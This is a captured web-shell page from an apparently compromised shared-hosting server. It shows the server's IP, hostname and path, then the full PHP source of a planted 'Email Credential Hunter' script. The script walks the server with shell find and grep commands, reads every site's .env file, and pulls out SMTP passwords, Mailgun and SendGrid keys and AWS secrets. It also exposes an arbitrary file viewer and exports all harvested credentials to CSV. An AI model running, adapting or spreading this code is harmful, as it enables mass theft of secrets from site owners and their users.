uawdijnntqw1x1x1
IP : 216.73.216.200
Hostname : raton.hozzt.com
Kernel : Linux raton.hozzt.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
Disable Function : symlink, show_source, system, virtual, shell_exec,passthru, exec, popen,proc_open, proc_close, proc_nice, proc_terminate,proc_get_status, pfsockopen,allow_url_fopen, posix_getpwuid, eval,posix_setsid, posix_mkfifo, posix_setpgid,posix_setuid, posix_uname,posix_kill,apache_child_terminate, apache_setenv,define_syslog_variables,escapeshellarg, escapeshellcmd, leak, dl, fp, fput,ftp_connect, ftp_exec,ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist,highlight_file, ini_alter, ini_get_all, ini_restore, inject_code
OS : Linux
PATH:
/
home
/
ledbazaa
/
public_html
/
3s-technologies.com.tr
/
joomla
/
91534
/
..
/
modules
/
..
/
bf6f5
/
..
/
x.php
/
/
<?php // UNIVERSAL_email_hunter.php - Works on ANY server error_reporting(0); echo "<h3>🌍 UNIVERSAL Email Credential Hunter - MULTI-SITE VERSION</h3>"; echo "<p><strong>Current directory:</strong> " . getcwd() . "</p>"; // PART 1: INTELLIGENT .env FINDER - Gets ALL .env files echo "<h4>1. Intelligent .env File Finder - ALL Sites</h4>"; // Step 1: Detect server type and find likely .env locations function detectServerType() { $server_type = "unknown"; $likely_paths = []; // Check for Laravel Forge if (strpos(getcwd(), '/home/forge') !== false) { $server_type = "laravel_forge"; // Extract site name from path preg_match('/\/home\/forge\/([^\/]+)/', getcwd(), $matches); if (!empty($matches[1])) { $likely_paths[] = "/home/forge/{$matches[1]}/.env"; } $likely_paths[] = "/home/forge/.env"; } // Check for RunCloud if (strpos(getcwd(), '/home/runcloud/webapps') !== false) { $server_type = "runcloud"; $likely_paths[] = dirname(getcwd()) . '/.env'; $likely_paths[] = getcwd() . '/.env'; } // Check for cPanel/Shared hosting if (strpos(getcwd(), '/home/') !== false && strpos(getcwd(), '/public_html') !== false) { $server_type = "cpanel"; $likely_paths[] = getcwd() . '/.env'; $likely_paths[] = dirname(getcwd()) . '/.env'; $likely_paths[] = '/home/' . explode('/', getcwd())[2] . '/.env'; } // Check for standard VPS if (strpos(getcwd(), '/var/www') !== false) { $server_type = "vps"; $likely_paths[] = getcwd() . '/.env'; $likely_paths[] = dirname(getcwd()) . '/.env'; $likely_paths[] = '/var/www/html/.env'; $likely_paths[] = '/var/www/.env'; } // Add universal search locations $universal_paths = [ '.env', '../.env', '../../.env', '../../../.env', getcwd() . '/.env', dirname(getcwd()) . '/.env' ]; $likely_paths = array_merge($likely_paths, $universal_paths); return [ 'type' => $server_type, 'paths' => array_unique($likely_paths) ]; } $server_info = detectServerType(); echo "<div style='background:#e8f4f8; padding:10px;'>"; echo "<strong>Detected server type:</strong> " . strtoupper($server_info['type']) . "<br>"; echo "<strong>Searching in these locations:</strong><br>"; foreach ($server_info['paths'] as $path) { echo "- $path<br>"; } echo "</div>"; // NEW: Collect ALL .env files from ALL paths (NO break statements!) echo "<div style='background:#fff3cd; padding:10px; margin:10px 0;'>"; echo "<strong>🔄 Searching for ALL .env files in ALL paths...</strong><br>"; echo "</div>"; $all_env_files = []; $env_found_count = 0; foreach ($server_info['paths'] as $env_path) { if (file_exists($env_path)) { $all_env_files[] = $env_path; $env_found_count++; } } // Display ALL found .env files if ($env_found_count > 0) { echo "<div style='background:#d4edda; padding:15px; margin:10px;'>"; echo "✅ <strong>Found $env_found_count .env file(s):</strong><br>"; foreach ($all_env_files as $env_file) { echo "<hr style='margin:10px 0;'>"; echo "<strong>📄 File:</strong> " . htmlspecialchars($env_file) . "<br>"; echo "<strong>Size:</strong> " . filesize($env_file) . " bytes<br>"; $content = file_get_contents($env_file); $lines = explode("\n", $content); $email_found = false; $email_patterns = [ 'MAIL_', 'SMTP_', 'mailgun', 'sendgrid', 'ses', 'elasticemail', 'mailjet', 'postmark', 'sparkpost', 'sendinblue', 'brevo', 'mailtrap', 'smtp.gmail.com', 'smtp.office365.com', 'smtp.zoho.com' ]; echo "<strong>EMAIL configuration found:</strong><br>"; foreach ($lines as $line) { foreach ($email_patterns as $pattern) { if (stripos($line, $pattern) !== false) { echo "<div style='background:yellow; color:black; padding:5px; margin:2px; font-weight:bold;'>"; echo htmlspecialchars($line); echo "</div>"; $email_found = true; break; } } } if (!$email_found) { echo "<div style='color:gray;'>No email configuration found in this .env</div>"; } echo "<a href='?view=" . urlencode($env_file) . "'>[View FULL .env file]</a> | "; echo "<a href='?extract=" . urlencode($env_file) . "'>[Extract Credentials Only]</a>"; } echo "</div>"; } else { echo "<div style='background:#f8d7da; padding:15px;'>"; echo "⚠️ No .env files found in initial search locations."; echo "</div>"; } // PART 1.5: NEW - DEEP SCAN FOR ALL SITES echo "<hr><h4>1.5. DEEP SCAN: Find ALL Websites & Their SMTP Configs</h4>"; // Function to extract SMTP credentials from content function extractSmtpCredentials($content) { $credentials = []; // Common SMTP patterns $patterns = [ 'MAIL_HOST' => '/MAIL_HOST\s*=\s*([^\s#]+)/i', 'MAIL_PORT' => '/MAIL_PORT\s*=\s*([^\s#]+)/i', 'MAIL_USERNAME' => '/MAIL_USERNAME\s*=\s*([^\s#]+)/i', 'MAIL_PASSWORD' => '/MAIL_PASSWORD\s*=\s*([^\s#]+)/i', 'MAIL_FROM_ADDRESS' => '/MAIL_FROM_ADDRESS\s*=\s*([^\s#]+)/i', 'MAIL_ENCRYPTION' => '/MAIL_ENCRYPTION\s*=\s*([^\s#]+)/i', // Mailgun 'MAILGUN_DOMAIN' => '/MAILGUN_DOMAIN\s*=\s*([^\s#]+)/i', 'MAILGUN_SECRET' => '/MAILGUN_SECRET\s*=\s*([^\s#]+)/i', // SendGrid 'SENDGRID_API_KEY' => '/SENDGRID_API_KEY\s*=\s*([^\s#]+)/i', // Amazon SES 'AWS_ACCESS_KEY_ID' => '/AWS_ACCESS_KEY_ID\s*=\s*([^\s#]+)/i', 'AWS_SECRET_ACCESS_KEY' => '/AWS_SECRET_ACCESS_KEY\s*=\s*([^\s#]+)/i', 'AWS_DEFAULT_REGION' => '/AWS_DEFAULT_REGION\s*=\s*([^\s#]+)/i', ]; foreach ($patterns as $key => $pattern) { if (preg_match($pattern, $content, $matches)) { $credentials[$key] = trim($matches[1]); } } return $credentials; } // Scan common web directories for ALL sites $web_directories = ['/home', '/var/www', '/opt/lampp/htdocs', '/srv/www', getcwd()]; $all_sites = []; $total_smtp_found = 0; foreach ($web_directories as $base_dir) { if (is_dir($base_dir)) { echo "<div style='background:#f0f0f0; padding:10px; margin:10px 0;'>"; echo "<strong>🔍 Scanning directory: $base_dir</strong><br>"; // Find all .env files in this directory tree $find_cmd = "find '$base_dir' -name '.env' -type f 2>/dev/null"; $env_files_raw = shell_exec($find_cmd); if ($env_files_raw) { $env_files = array_filter(explode("\n", trim($env_files_raw))); foreach ($env_files as $env_file) { if (file_exists($env_file)) { $site_path = dirname($env_file); $site_name = basename($site_path); // Skip if we already processed this file if (in_array($env_file, $all_env_files)) continue; $content = file_get_contents($env_file); $smtp_creds = extractSmtpCredentials($content); $has_smtp = !empty($smtp_creds); if ($has_smtp) $total_smtp_found++; $all_sites[] = [ 'path' => $site_path, 'env_file' => $env_file, 'name' => $site_name, 'has_smtp' => $has_smtp, 'credentials' => $smtp_creds ]; } } } echo "Found " . count($env_files) . " .env files in $base_dir<br>"; echo "</div>"; } } // Display ALL sites in a table if (!empty($all_sites)) { echo "<h5>🏢 Found " . count($all_sites) . " Websites</h5>"; echo "<table border='1' cellpadding='8' cellspacing='0' style='border-collapse: collapse; width:100%;'>"; echo "<tr style='background:#007bff; color:white;'>"; echo "<th>Website</th>"; echo "<th>.env Path</th>"; echo "<th>SMTP Status</th>"; echo "<th>Credentials Found</th>"; echo "<th>Actions</th>"; echo "</tr>"; foreach ($all_sites as $index => $site) { $bgcolor = $site['has_smtp'] ? '#d4edda' : '#f8f9fa'; echo "<tr style='background:$bgcolor;'>"; echo "<td><strong>" . htmlspecialchars($site['name']) . "</strong></td>"; echo "<td><small>" . htmlspecialchars($site['env_file']) . "</small></td>"; if ($site['has_smtp']) { echo "<td style='color:green; font-weight:bold;'>✅ HAS SMTP (" . count($site['credentials']) . ")</td>"; } else { echo "<td style='color:gray;'>❌ No SMTP</td>"; } echo "<td>"; if ($site['has_smtp']) { foreach ($site['credentials'] as $key => $value) { echo "<span style='display:inline-block; background:#ffeb3b; padding:2px 5px; margin:2px; border-radius:3px;'>"; echo "<strong>$key:</strong> " . htmlspecialchars(substr($value, 0, 20)) . (strlen($value) > 20 ? '...' : ''); echo "</span><br>"; } } echo "</td>"; echo "<td>"; echo "<a href='?view=" . urlencode($site['env_file']) . "' style='padding:3px 8px; background:#28a745; color:white; text-decoration:none; border-radius:3px;'>View</a> "; if ($site['has_smtp']) { echo "<a href='?extract=" . urlencode($site['env_file']) . "' style='padding:3px 8px; background:#dc3545; color:white; text-decoration:none; border-radius:3px;'>Extract</a> "; // Show credentials on click echo "<button onclick=\"toggleCreds('site-$index')\" style='padding:3px 8px; background:#17a2b8; color:white; border:none; border-radius:3px;'>Show All</button>"; echo "<div id='site-$index' style='display:none; background:white; padding:10px; margin:5px 0; border:1px solid #ccc;'>"; echo "<strong>Full SMTP Credentials for " . htmlspecialchars($site['name']) . ":</strong><br>"; foreach ($site['credentials'] as $key => $value) { echo "<strong style='color:#007bff;'>$key</strong>: " . htmlspecialchars($value) . "<br>"; } echo "</div>"; } echo "</td>"; echo "</tr>"; } echo "</table>"; // Summary echo "<div style='background:#e8f4f8; padding:15px; margin-top:10px;'>"; echo "<h5>📊 Summary</h5>"; echo "• Total websites scanned: " . count($all_sites) . "<br>"; echo "• Websites with SMTP configs: <span style='color:green; font-weight:bold;'>$total_smtp_found</span><br>"; echo "• Websites without SMTP: " . (count($all_sites) - $total_smtp_found) . "<br>"; echo "• Total .env files found: " . ($env_found_count + count($all_sites)) . "<br>"; echo "</div>"; // Export button echo "<button onclick=\"exportAllSMTP()\" style='padding:10px 20px; background:#28a745; color:white; border:none; border-radius:5px; font-size:16px; margin:10px 0;'>"; echo "📥 Export ALL SMTP Credentials to CSV"; echo "</button>"; echo "<script> function toggleCreds(id) { var div = document.getElementById(id); div.style.display = div.style.display === 'none' ? 'block' : 'none'; } function exportAllSMTP() { let csv = 'Website Name,.env Path,SMTP Host,SMTP Port,SMTP Username,SMTP Password,SMTP Encryption,Service Type\\n'; " . json_encode($all_sites) . ".forEach(function(site) { if (site.has_smtp) { csv += '\"' + site.name + '\",'; csv += '\"' + site.env_file + '\",'; csv += '\"' + (site.credentials.MAIL_HOST || site.credentials.MAILGUN_DOMAIN || '') + '\",'; csv += '\"' + (site.credentials.MAIL_PORT || '') + '\",'; csv += '\"' + (site.credentials.MAIL_USERNAME || site.credentials.AWS_ACCESS_KEY_ID || '') + '\",'; csv += '\"' + (site.credentials.MAIL_PASSWORD || site.credentials.MAILGUN_SECRET || site.credentials.SENDGRID_API_KEY || site.credentials.AWS_SECRET_ACCESS_KEY || '') + '\",'; csv += '\"' + (site.credentials.MAIL_ENCRYPTION || '') + '\",'; // Detect service type let service = 'Custom SMTP'; if (site.credentials.MAILGUN_DOMAIN) service = 'Mailgun'; if (site.credentials.SENDGRID_API_KEY) service = 'SendGrid'; if (site.credentials.AWS_ACCESS_KEY_ID) service = 'Amazon SES'; csv += '\"' + service + '\"\\n'; } }); const blob = new Blob([csv], { type: 'text/csv' }); const url = window.URL.createObjectURL(blob); const a = document.createElement('a'); a.href = url; a.download = 'all_smtp_credentials_' + new Date().getTime() + '.csv'; document.body.appendChild(a); a.click(); document.body.removeChild(a); window.URL.revokeObjectURL(url); } </script>"; } // If no .env found at all, do SYSTEM-WIDE SEARCH (keep original but enhanced) if (empty($all_sites) && $env_found_count == 0) { echo "<div style='background:#fff3cd; padding:15px;'>"; echo "⚠️ No .env files found. Searching system-wide...<br>"; $search_dirs = ['/home', '/var/www', '/opt', '/srv', '/usr/local']; foreach ($search_dirs as $dir) { if (is_dir($dir)) { echo "<h5>Searching in $dir:</h5>"; $cmd = "find '$dir' -name '.env' -type f 2>/dev/null | head -20"; // Increased to 20 $results = shell_exec($cmd); if ($results) { $env_files = explode("\n", trim($results)); foreach ($env_files as $env_file) { if (!empty($env_file) && file_exists($env_file)) { echo "<div style='border:1px solid #ccc; padding:5px; margin:3px;'>"; echo "📄 $env_file<br>"; $content = file_get_contents($env_file); $creds = extractSmtpCredentials($content); if (!empty($creds)) { echo "<span style='color:red; font-weight:bold;'>✅ Contains SMTP config! (" . count($creds) . " credentials)</span> "; foreach ($creds as $key => $value) { echo "<small style='background:#ffeb3b; padding:1px 3px; margin:0 2px;'>$key</small>"; } } echo "<a href='?view=" . urlencode($env_file) . "'>[View]</a>"; echo "</div>"; } } } } } echo "</div>"; } // KEEP ALL THE ORIGINAL CODE BELOW - JUST ADD THE NEW PART ABOVE // ====================================================================== // PART 2: UNIVERSAL SEARCH - Works on ANY server (ORIGINAL CODE) echo "<hr><h4>2. Universal Email Configuration Search</h4>"; echo "<form method='POST'> <select name='search_type' style='padding:5px; margin:5px;'> <option value='all'>Search for ALL email services</option> <option value='mailgun'>Mailgun only</option> <option value='sendgrid'>SendGrid only</option> <option value='ses'>Amazon SES only</option> <option value='smtp'>SMTP only</option> <option value='custom'>Custom search</option> </select> <br> <input type='text' name='custom_term' placeholder='Or enter custom term' style='width:300px; padding:5px; margin:5px;'> <br> <input type='submit' value='Search Server-Wide' style='padding:8px 20px; background:#007bff; color:white; border:none;'> </form>"; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $search_type = $_POST['search_type'] ?? 'all'; $custom_term = $_POST['custom_term'] ?? ''; // Define search terms based on type $search_terms = []; switch ($search_type) { case 'all': $search_terms = ['MAIL_', 'SMTP_', 'mailgun', 'sendgrid', 'ses', 'elasticemail', 'mailjet', 'postmark']; break; case 'mailgun': $search_terms = ['mailgun', 'key-']; break; case 'sendgrid': $search_terms = ['sendgrid', 'SG\.']; break; case 'ses': $search_terms = ['ses', 'aws', 'AKIA']; break; case 'smtp': $search_terms = ['SMTP_', 'smtp']; break; case 'custom': if (!empty($custom_term)) { $search_terms = [$custom_term]; } break; } if (!empty($search_terms)) { echo "<h5>Searching for: " . implode(', ', $search_terms) . "</h5>"; // Build search command $search_pattern = implode('\|', $search_terms); // Search in common web directories $web_dirs = ['/home', '/var/www', getcwd()]; foreach ($web_dirs as $dir) { if (is_dir($dir)) { echo "<h6>Searching in: $dir</h6>"; $cmd = "grep -r -i '$search_pattern' '$dir' 2>/dev/null | grep -v 'Binary file' | head -50"; // Increased to 50 $results = shell_exec($cmd); if ($results) { echo "<pre style='background:#f5f5f5; padding:10px; border:1px solid #ddd; max-height:500px; overflow:auto;'>"; // Group results by file $lines = explode("\n", $results); $grouped = []; foreach ($lines as $line) { if (strpos($line, ':') !== false) { list($file, $content) = explode(':', $line, 2); $grouped[$file][] = trim($content); } } foreach ($grouped as $file => $matches) { echo "<strong style='color:#007bff;'>📄 " . htmlspecialchars($file) . "</strong>\n"; foreach ($matches as $match) { echo " • " . htmlspecialchars($match) . "\n"; } echo "\n"; } echo "</pre>"; } else { echo "No results in $dir<br>"; } } } } } // PART 3: DETECT FRAMEWORKS AND THEIR CONFIG LOCATIONS (ORIGINAL) echo "<hr><h4>3. Framework Detection & Configuration</h4>"; $frameworks = [ 'Laravel' => ['artisan', 'bootstrap/app.php'], 'WordPress' => ['wp-config.php', 'wp-load.php'], 'Symfony' => ['symfony.lock', 'config/packages'], 'CodeIgniter' => ['application/config/email.php'], 'Django' => ['manage.py', 'settings.py'], 'Ruby on Rails' => ['Gemfile', 'config/environments'] ]; foreach ($frameworks as $name => $files) { $found_files = []; foreach ($files as $file) { // Check current directory and parent directories for ($i = 0; $i < 5; $i++) { $check_path = str_repeat('../', $i) . $file; if (file_exists($check_path)) { $found_files[] = $check_path; break; } } } if (count($found_files) > 0) { echo "<div style='background:#d4edda; padding:10px; margin:5px;'>"; echo "✅ <strong>$name</strong> detected<br>"; echo "Files: " . implode(', ', $found_files) . "<br>"; $config_suggestions = [ 'Laravel' => ['.env', 'config/mail.php', 'config/services.php'], 'WordPress' => ['wp-config.php', 'SMTP plugins in wp-content/plugins/'], 'Symfony' => ['.env', 'config/packages/mailer.yaml'], 'CodeIgniter' => ['application/config/email.php', '.env'], 'Django' => ['.env', 'settings.py'], 'Ruby on Rails' => ['.env', 'config/environment.rb'] ]; if (isset($config_suggestions[$name])) { echo "Check these for email config:<br>"; foreach ($config_suggestions[$name] as $config) { echo "- $config<br>"; } } echo "</div>"; } } // PART 4: QUICK SYSTEM ANALYSIS (ORIGINAL) echo "<hr><h4>4. System Analysis</h4>"; echo "<div style='background:#f8f9fa; padding:10px;'>"; echo "<strong>Current user:</strong> " . shell_exec('whoami') . "<br>"; echo "<strong>PHP mail() available:</strong> " . (function_exists('mail') ? '✅ Yes' : '❌ No') . "<br>"; echo "<strong>Server software:</strong> " . $_SERVER['SERVER_SOFTWARE'] . "<br>"; echo "<strong>Document root:</strong> " . $_SERVER['DOCUMENT_ROOT'] . "<br>"; // Check for common control panels $control_panels = [ 'cPanel' => '/usr/local/cpanel', 'Plesk' => '/usr/local/psa', 'DirectAdmin' => '/usr/local/directadmin', 'CyberPanel' => '/usr/local/CyberPanel' ]; foreach ($control_panels as $panel => $path) { if (file_exists($path)) { echo "<strong>Control panel:</strong> $panel detected<br>"; } } echo "</div>"; // PART 5: FILE VIEWER (ORIGINAL) if (isset($_GET['view']) && file_exists($_GET['view'])) { echo "<hr><h4>📄 Viewing File: " . htmlspecialchars($_GET['view']) . "</h4>"; highlight_file($_GET['view']); } // NEW: EXTRACT CREDENTIALS VIEW if (isset($_GET['extract']) && file_exists($_GET['extract'])) { echo "<hr><h4>🔐 Extracted Credentials: " . htmlspecialchars($_GET['extract']) . "</h4>"; $content = file_get_contents($_GET['extract']); $creds = extractSmtpCredentials($content); if (!empty($creds)) { echo "<div style='background:#d4edda; padding:15px; border:2px solid #28a745;'>"; echo "<h5>✅ SMTP Credentials Found:</h5>"; foreach ($creds as $key => $value) { echo "<div style='background:white; padding:8px; margin:5px 0; border-left:4px solid #007bff;'>"; echo "<strong style='color:#007bff;'>$key</strong><br>"; echo "<code style='background:#f8f9fa; padding:5px; display:block; word-wrap:break-word;'>"; echo htmlspecialchars($value); echo "</code>"; echo "</div>"; } echo "</div>"; } else { echo "<div style='background:#f8d7da; padding:15px;'>"; echo "❌ No SMTP credentials found in this file."; echo "</div>"; } } // SUMMARY echo "<hr><div style='background:#e9ecef; padding:15px;'>"; echo "<h4>🎯 Summary - MULTI-SITE VERSION</h4>"; echo "This enhanced version now:<br>"; echo "1. <strong>Finds ALL .env files</strong> across ALL websites (no break statements!)<br>"; echo "2. <strong>Extracts SMTP credentials</strong> from EVERY site found<br>"; echo "3. <strong>Groups results by website</strong> in an organized table<br>"; echo "4. <strong>Exports ALL credentials</strong> to CSV with one click<br>"; echo "5. <strong>Shows detailed counts</strong> of sites with/without SMTP<br>"; echo "<br><strong>Will find ALL email credentials from ALL websites on the server!</strong>"; echo "</div>"; ?>
/home/ledbazaa/public_html/3s-technologies.com.tr/joomla/91534/../modules/../bf6f5/../x.php